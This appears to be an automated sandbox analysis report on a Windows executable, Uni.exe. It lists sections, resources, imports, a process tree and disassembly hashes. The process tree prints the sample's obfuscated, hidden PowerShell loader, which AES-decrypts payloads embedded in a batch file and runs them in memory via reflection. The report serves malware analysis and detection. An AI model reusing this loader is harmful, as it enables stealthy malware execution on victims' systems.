.pdata	0xe000	0x444	0x1000	d87d18cc3448a50b581d9a9660a39914	False	0.164306640625	PEX Binary Archive	1.4622023798757706	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xf000	0x820000	0x820000	a25e6e2ead39059fecf903b16a9ef7f9	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x82f000	0x30	0x1000	b86e33c1f7fc5de5ef683b7d6eea5c32	False	0.01806640625	data	0.11282277483477143	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
AVI	0xfa10	0x2e1a	RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp	English	United States	0.2713099474665311
RT_ICON	0x1282c	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.3225609756097561
RT_ICON	0x12e94	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.41263440860215056
RT_ICON	0x1317c	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	English	United States	0.4569672131147541
RT_ICON	0x13364	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.5574324324324325
RT_ICON	0x1348c	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.6223347547974414
RT_ICON	0x14334	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.7369133574007221
RT_ICON	0x14bdc	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	English	United States	0.783410138248848
RT_ICON	0x152a4	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.3829479768786127
RT_ICON	0x1580c	0xd9d2	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	1.0004662673505254
RT_ICON	0x231e0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.5300829875518672
RT_ICON	0x25788	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.6137429643527205
RT_ICON	0x26830	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.703688524590164
RT_ICON	0x271b8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.425531914893617
RT_DIALOG	0x27620	0x34c	data	Polish	Poland	0.46445497630331756
RT_DIALOG	0x2796c	0x1b0	data	Polish	Poland	0.6041666666666666
RT_DIALOG	0x27b1c	0x174	data	Polish	Poland	0.5591397849462365
RT_DIALOG	0x27c90	0x1dc	data	Polish	Poland	0.5378151260504201
RT_DIALOG	0x27e6c	0x14a	data	Polish	Poland	0.5393939393939394
RT_DIALOG	0x27fb8	0x12a	data	Polish	Poland	0.6140939597315436
RT_STRING	0x280e4	0x8e	Matlab v4 mat-file (little endian) y, numeric, rows 0, columns 0	Polish	Poland	0.6830985915492958
RT_STRING	0x28174	0x5fa	data	Polish	Poland	0.4
RT_STRING	0x28770	0x6bc	data	Polish	Poland	0.37180974477958234
RT_STRING	0x28e2c	0x524	data	Polish	Poland	0.4027355623100304
RT_STRING	0x29350	0x472	data	Polish	Poland	0.4279437609841828
RT_STRING	0x297c4	0x346	data	Polish	Poland	0.4212410501193317
RT_RCDATA	0x29b0c	0x7	ASCII text, with no line terminators	English	United States	2.142857142857143
RT_RCDATA	0x29b14	0x803b32	Microsoft Cabinet archive data, Windows 2000/XP setup, 8403762 bytes, 1 file, at 0x2c +A "Uni.bat", ID 657, number 1, 402 datablocks, 0x1503 compression	Polish	Poland	1.0002708435058594
RT_RCDATA	0x82d648	0x4	data	Polish	Poland	3.0
RT_RCDATA	0x82d64c	0x24	data	Polish	Poland	0.8055555555555556
RT_RCDATA	0x82d670	0x7	ASCII text, with no line terminators	Polish	Poland	2.142857142857143
RT_RCDATA	0x82d678	0x7	ASCII text, with no line terminators	Polish	Poland	2.142857142857143
RT_RCDATA	0x82d680	0x4	data	Polish	Poland	3.0
RT_RCDATA	0x82d684	0x7	ASCII text, with no line terminators	English	United States	2.142857142857143
RT_RCDATA	0x82d68c	0x4	data	Polish	Poland	3.0
RT_RCDATA	0x82d690	0x11	ASCII text, with no line terminators	English	United States	1.4705882352941178
RT_RCDATA	0x82d6a4	0x4	data	Polish	Poland	3.0
RT_RCDATA	0x82d6a8	0x2	data	Polish	Poland	5.0
RT_RCDATA	0x82d6ac	0x7	ASCII text, with no line terminators	Polish	Poland	2.142857142857143
RT_RCDATA	0x82d6b4	0x13	ASCII text, with no line terminators	English	United States	1.4210526315789473
RT_GROUP_ICON	0x82d6c8	0xbc	data	English	United States	0.6117021276595744
RT_VERSION	0x82d784	0x400	data	English	United States	0.416015625
RT_VERSION	0x82db84	0x440	data	Polish	Poland	0.45036764705882354
RT_MANIFEST	0x82dfc4	0x7e6	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.37734915924826906

Imports

DLL	Import
ADVAPI32.dll	GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll	_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose
GDI32.dll	GetDeviceCaps
USER32.dll	ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetSystemMetrics, CallWindowProcA, SetWindowTextA, MessageBoxA, SendDlgItemMessageA, SendMessageA, GetDlgItem, DialogBoxIndirectParamA, GetWindowLongPtrA, SetWindowLongPtrA, SetForegroundWindow, ReleaseDC, EnableWindow, CharNextA, LoadStringA, CharPrevA, EndDialog, MessageBeep, ExitWindowsEx, SetDlgItemTextA, CharUpperA, GetDesktopWindow, PeekMessageA, GetDlgItemTextA
msvcrt.dll	?terminate@@YAXXZ, _commode, _fmode, _acmdln, __C_specific_handler, memset, __setusermatherr, _ismbblead, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, _XcptFilter, memcpy_s, _vsnprintf, _initterm, memcpy
COMCTL32.dll
Cabinet.dll
VERSION.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
Polish	Poland

Target ID:	0
Start time:	02:30:11
Start date:	16/12/2024
Path:	C:\Users\user\Desktop\Uni.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Uni.exe"
Imagebase:	0x7ff7a08c0000
File size:	8'581'120 bytes
MD5 hash:	917C0479804B76AE493BAD95BF0C7710
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:30:11
Start date:	16/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c "Uni.bat"
Imagebase:	0x7ff6ff6a0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:30:11
Start date:	16/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:30:20
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe
Wow64 process (32bit):	false
Commandline:	"Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function fVoxT($oPFNE){ $iLIer=[System.Security.Cryptography.Aes]::Create(); $iLIer.Mode=[System.Security.Cryptography.CipherMode]::CBC; $iLIer.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $iLIer.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('reBXu8mWH2aPSY80rUiY+qal9/pmltEFd4YzecO07u8='); $iLIer.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SCYRvuoYNjwRzXky6x630g=='); $APXpI=$iLIer.CreateDecryptor(); $return_var=$APXpI.TransformFinalBlock($oPFNE, 0, $oPFNE.Length); $APXpI.Dispose(); $iLIer.Dispose(); $return_var;}function WmmYx($oPFNE){ $toQfi=New-Object System.IO.MemoryStream(,$oPFNE); $LIvgb=New-Object System.IO.MemoryStream; $Glywg=New-Object System.IO.Compression.GZipStream($toQfi, [IO.Compression.CompressionMode]::Decompress); $Glywg.CopyTo($LIvgb); $Glywg.Dispose(); $toQfi.Dispose(); $LIvgb.Dispose(); $LIvgb.ToArray();}function AHAKZ($oPFNE,$XBFqp){ $TaiwF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$oPFNE); $JZvRO=$TaiwF.EntryPoint; $JZvRO.Invoke($null, $XBFqp);}$ZxJef=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Uni.bat').Split([Environment]::NewLine);foreach ($faxqr in $ZxJef) { if ($faxqr.StartsWith('SEROXEN')) { $MyVZJ=$faxqr.Substring(7); break; }}$tSYrU=[string[]]$MyVZJ.Split('\');$WdICd=WmmYx (fVoxT ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tSYrU[0])));$eFigo=WmmYx (fVoxT ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tSYrU[1])));AHAKZ $eFigo (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));AHAKZ $WdICd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
Imagebase:	0x7ff6ac870000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:30:21
Start date:	16/12/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\"
Imagebase:	0x7ff609d10000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 00007FF7A08C18E4 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF7A08C1914
GetCurrentProcessId.KERNEL32 ref: 00007FF7A08C1922
GetCurrentThreadId.KERNEL32 ref: 00007FF7A08C192E
GetTickCount.KERNEL32 ref: 00007FF7A08C193A
GetTickCount.KERNEL32 ref: 00007FF7A08C194A
QueryPerformanceCounter.KERNEL32 ref: 00007FF7A08C1965

Memory Dump Source

Source File: 00000000.00000002.1421468755.00007FF7A08C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A08C0000, based on PE: true

Associated: 00000000.00000002.1421455385.00007FF7A08C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421486080.00007FF7A08C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421534975.00007FF7A08CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421550837.00007FF7A08CE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7a08c0000_Uni.jbxd

Similarity

API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 4104442557-0
Opcode ID: a1a8c30bc5a850f7df6bb2e960b2db2709fe8c778fbb0e1b446c87b4c6fef4b3
Instruction ID: aff84776b5184d4af49dd8c77a007ddd30e3e2e4f46727f2048d417a06e195f7
Opcode Fuzzy Hash: a1a8c30bc5a850f7df6bb2e960b2db2709fe8c778fbb0e1b446c87b4c6fef4b3
Instruction Fuzzy Hash: C9114221605F4287EB00EF70E8481A873B4F749758F810E70EAAD47764DF7CE5658358

Analysis Process: Uni.bat.exePID: 7680, Parent PID: 7492COMMON

Executed Functions

Function 00007FFAAB8474BD Relevance: 3.1, Strings: 2, Instructions: 626COMMON

Download Yara Rule

Strings

r6g, xrefs: 00007FFAAB84756E
r6g, xrefs: 00007FFAAB8475FE

Memory Dump Source

Source File: 00000005.00000002.1419831188.00007FFAAB840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffaab840000_Uni.jbxd

Similarity

API ID:
String ID: r6g$r6g
API String ID: 0-2484190097
Opcode ID: 12cf67599617b3db120979069d766eb92eb45f12673a4c8c816df8042fdfffa1
Instruction ID: 8f122dd753e8fb7c8d2fb051d4550bd9c2b3325fa6c43fdb1387c8e0cd946d13
Opcode Fuzzy Hash: 12cf67599617b3db120979069d766eb92eb45f12673a4c8c816df8042fdfffa1
Instruction Fuzzy Hash: 1202156290EBCA4FE7969B3CD8555B47FE1EF5B250B0981FBC04DCB1A3D919A809C381

Function 00007FFAAB8431F5 Relevance: .4, Instructions: 445COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1419831188.00007FFAAB840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffaab840000_Uni.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87848fc7ffc1e4a4dd30331619defbc6123e25e2c81ed62c0ef6af015bf7fc72
Instruction ID: 40d6b0f233b35a6255458adcb067ab8e986269dba9dc1b6e646888d189797aa5
Opcode Fuzzy Hash: 87848fc7ffc1e4a4dd30331619defbc6123e25e2c81ed62c0ef6af015bf7fc72
Instruction Fuzzy Hash: A0D1387292EB8A9FE7669B7C88555F5BF91FF16354B0840FAD04DC70A3D918A8098381

Function 00007FFAAB8479BF Relevance: 4.3, Strings: 3, Instructions: 522COMMON

Download Yara Rule

Strings

6g, xrefs: 00007FFAAB847DC8
6g, xrefs: 00007FFAAB847EA4
6g, xrefs: 00007FFAAB847F62

Memory Dump Source

Source File: 00000005.00000002.1419831188.00007FFAAB840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffaab840000_Uni.jbxd

Similarity

API ID:
String ID: 6g$6g$6g
API String ID: 0-1388957575
Opcode ID: eb2b116acf458093d43ac1f48ea3129d7effe1a4ebbcc41b4c6ec46523c57b4a
Instruction ID: 80f39d94b57fb900eadfff7747f444f1f1e54c528a9052a7dfc6e895eb55ee58
Opcode Fuzzy Hash: eb2b116acf458093d43ac1f48ea3129d7effe1a4ebbcc41b4c6ec46523c57b4a
Instruction Fuzzy Hash: 2CF1F16290EBCA4FE3A6973C98156B57FD1EF5A250B0941FAD08DC71E3E918AC098391

Function 00007FFAAB846769 Relevance: 2.9, Strings: 2, Instructions: 442COMMON

Download Yara Rule

Strings

p[i, xrefs: 00007FFAAB846A57
6g, xrefs: 00007FFAAB84691F

Memory Dump Source

Source File: 00000005.00000002.1419831188.00007FFAAB840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffaab840000_Uni.jbxd

Similarity

API ID:
String ID: 6g$p[i
API String ID: 0-2884593450
Opcode ID: 1a3b933e9ec748632ae0c97eb3bd4a918cc49dded8d5bcfac39ff8bafbb01b11
Instruction ID: b002477754239d6dca5017e034c0bead5446de06cb4f57c9f03a5481aa121ae5
Opcode Fuzzy Hash: 1a3b933e9ec748632ae0c97eb3bd4a918cc49dded8d5bcfac39ff8bafbb01b11
Instruction Fuzzy Hash: CDD1766290EBCA4FE792DB7888156E57FE1EF5B250F0841FBD44DC71A3DA18A809C381

Function 00007FFAAB77555C Relevance: 1.8, Strings: 1, Instructions: 512COMMON

Download Yara Rule

Strings

O_^, xrefs: 00007FFAAB775801

Memory Dump Source

Source File: 00000005.00000002.1419658351.00007FFAAB770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffaab770000_Uni.jbxd

Similarity

API ID:
String ID: O_^
API String ID: 0-3781818083
Opcode ID: 021aa9be860c32a4f43eacd600cf7da83a61111a37614ff6d6eddca230366a35
Instruction ID: a21e315dea75ef591e4e38509fadb533e8af3f8a0f2ef455ccba33843d9a32a1
Opcode Fuzzy Hash: 021aa9be860c32a4f43eacd600cf7da83a61111a37614ff6d6eddca230366a35
Instruction Fuzzy Hash: F9E14B7250EB858FE345DB2CC8A55A47FE0EF9726070841BED0C9CB1B3D955A84B8792

Function 00007FFAAB7745FB Relevance: 1.7, Strings: 1, Instructions: 475COMMON

Download Yara Rule

Strings

6g, xrefs: 00007FFAAB7748E2

Memory Dump Source

Source File: 00000005.00000002.1419658351.00007FFAAB770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffaab770000_Uni.jbxd

Similarity

API ID:
String ID: 6g
API String ID: 0-1031791518
Opcode ID: a61477d24ca756980ac22342a92b74265cd5907537390f8d988bfd933f44ff55
Instruction ID: 8d9217929da2ca4a974df1ec8c402ad52e44905a06a8f879afc667c9eeda22ff
Opcode Fuzzy Hash: a61477d24ca756980ac22342a92b74265cd5907537390f8d988bfd933f44ff55
Instruction Fuzzy Hash: BCE10431A0AA59CFEB84DF5CC455AED7BF1FF9A350F0441B6D00DD72A6CA24A88687C1

Function 00007FFAAB840532 Relevance: .5, Instructions: 536COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1419831188.00007FFAAB840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffaab840000_Uni.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f12dd743c4f5914b6a88a7dcf365927db7966b782c1a830319a9a9cbb7f5ae5
Instruction ID: e71837219057687e36270d727ece559278f0ab5499abe268feb229792219a664
Opcode Fuzzy Hash: 8f12dd743c4f5914b6a88a7dcf365927db7966b782c1a830319a9a9cbb7f5ae5
Instruction Fuzzy Hash: CCF1266190E7CA8FE7569B7CD8556E57FE0EF47260B0980FBD04DCB1A3D918A809C392

Function 00007FFAAB84483D Relevance: .4, Instructions: 418COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1419831188.00007FFAAB840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffaab840000_Uni.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a6b10259a122661b897a8a6bf6d7c96ce9463fd1e2a875f5a4db2e4facb2422
Instruction ID: bf65546250e071a97367f5b4be349f60036ba565233a9ab704030e3dd7cf319f
Opcode Fuzzy Hash: 7a6b10259a122661b897a8a6bf6d7c96ce9463fd1e2a875f5a4db2e4facb2422
Instruction Fuzzy Hash: 9FC1036180E7C99FE7569B3898145E57FA0EF57660B0941FBD08DCB4A3DE18A80AC3D2

Function 00007FFAAB842D0D Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1419831188.00007FFAAB840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffaab840000_Uni.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e12060f8bbb1fe88bb5eeefe4cc0fff3a5198c83a56ffb2e574ec907ba91f59
Instruction ID: 87689e76ea561252a4c2e8e6e2a751c647b9924eea1ea288f7a1f863381cc82f
Opcode Fuzzy Hash: 1e12060f8bbb1fe88bb5eeefe4cc0fff3a5198c83a56ffb2e574ec907ba91f59
Instruction Fuzzy Hash: 31A123A281EB8D5FD7A1EB78C8546E57FA1EF5A254F0401FBD44DC71A3DA18A808C391

Function 00007FFAAB842873 Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1419831188.00007FFAAB840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffaab840000_Uni.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8f8b24150572eec65189f2fb5efd11089961a1c8c2612562fa4ccc3e059c2f7
Instruction ID: db147e43d8da2e7ad454991af6864c8663ce19e440fe4ca448713c128335826a
Opcode Fuzzy Hash: b8f8b24150572eec65189f2fb5efd11089961a1c8c2612562fa4ccc3e059c2f7
Instruction Fuzzy Hash: 8081E56191EBCA4FE7639B3898545A07FE1EF57250B0941EBD48DCB0A3D919AC0AC392

Function 00007FFAAB775BF2 Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1419658351.00007FFAAB770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffaab770000_Uni.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82966d3bce5b35baecfc30ca4334987b6a83ef836f1af09244b32b946b8b347b
Instruction ID: d3f3f9f5180f5f9eb4eab418e1b3b70cbe955e8ff541d466d82eeeefe50baf64
Opcode Fuzzy Hash: 82966d3bce5b35baecfc30ca4334987b6a83ef836f1af09244b32b946b8b347b
Instruction Fuzzy Hash: F8717C30909A4E8FDF94DF58C494AA97BF2FF69340F14826AD40DD72A5CA70E885CBC0

Function 00007FFAAB84288A Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1419831188.00007FFAAB840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffaab840000_Uni.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5462f067763f0f7f364b23b769c03495cd229d4663a1022a4e29dac3779ba58b
Instruction ID: ed68f0823ca109f60b2dca4f5dd194f60f7fd9be3a23af47345fa97150b76e23
Opcode Fuzzy Hash: 5462f067763f0f7f364b23b769c03495cd229d4663a1022a4e29dac3779ba58b
Instruction Fuzzy Hash: 9D61E35581F7C64FE7638B7888245A13FE19F57260B0E81EBD488CB0B3D9096C0EC3A2

Function 00007FFAAB844911 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1419831188.00007FFAAB840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffaab840000_Uni.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28829d7ca905bbba61fcf13989f0906d15e15ac83a4a22614498999eaba10a0e
Instruction ID: d1ebcebce534aa6a4b964305a344ddd3059c1ce4b2bcdfa664b37c43f174fb32
Opcode Fuzzy Hash: 28829d7ca905bbba61fcf13989f0906d15e15ac83a4a22614498999eaba10a0e
Instruction Fuzzy Hash: 7841396291EA898FE7A5DB2C94446B87BD1EF9A650B0D81FAC04EC71A3DD14BC0D83C1

Function 00007FFAAB842E44 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1419831188.00007FFAAB840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffaab840000_Uni.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77aaff71c048390677dd1943a68e13a22d1224d723a925bfffa732d5a988c364
Instruction ID: f5cbaaa747cf6a334f3eddfb5d92ddfe70f6e1cdb12c49b183fe53ac6e740d49
Opcode Fuzzy Hash: 77aaff71c048390677dd1943a68e13a22d1224d723a925bfffa732d5a988c364
Instruction Fuzzy Hash: 1D112B66C2FA8B8FE7A1DB3C85502F86AC1EF59250B4840FAC04DC71E3DD18B80883C1

Function 00007FFAAB8407BB Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1419831188.00007FFAAB840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffaab840000_Uni.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d790019cd94be43739c4d7e4bb27baea05819a153c568475a1effed441d5b72f
Instruction ID: eed34d470e9bd97d7865422aebc846adf1b8c8a057a84ce0c618623a666d10ec
Opcode Fuzzy Hash: d790019cd94be43739c4d7e4bb27baea05819a153c568475a1effed441d5b72f
Instruction Fuzzy Hash: FE114822A1FA4B4FF7A9977C99111FA61C2DF89260F0840FAD40EC7293DD19BC0942C5

Function 00007FFAAB775144 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1419658351.00007FFAAB770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffaab770000_Uni.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8bf39ff701af052acee4258648be14f33bcb6ee973f2c1e07d03880ff18e194
Instruction ID: 8bc80c8419c41b6dee75b56e0cf9ff9f5c825a0f26fa00df7c0f0502aed00a9d
Opcode Fuzzy Hash: b8bf39ff701af052acee4258648be14f33bcb6ee973f2c1e07d03880ff18e194
Instruction Fuzzy Hash: F401D67271D6444FDB98DF1CA8815B533D1EB96361B14427EE08AC7166C412E8438781

Function 00007FFAAB8455FD Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1419831188.00007FFAAB840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffaab840000_Uni.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a03144a716edba5feafe5d5dd3db4f01db20dcf0ba31558ca369df37d5360115
Instruction ID: afa3d1fbb68231b78f0182473df09771a5f37b151f82b1d8d9f0cb193dc6c1a5
Opcode Fuzzy Hash: a03144a716edba5feafe5d5dd3db4f01db20dcf0ba31558ca369df37d5360115
Instruction Fuzzy Hash: CB01569291FBC54FE295977C88591EC6B91AF5B690B1884FED09DC71E3D8181C0D8392

Function 00007FFAAB7754F5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1419658351.00007FFAAB770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffaab770000_Uni.jbxd

Similarity

API ID:
String ID:
API String ID:
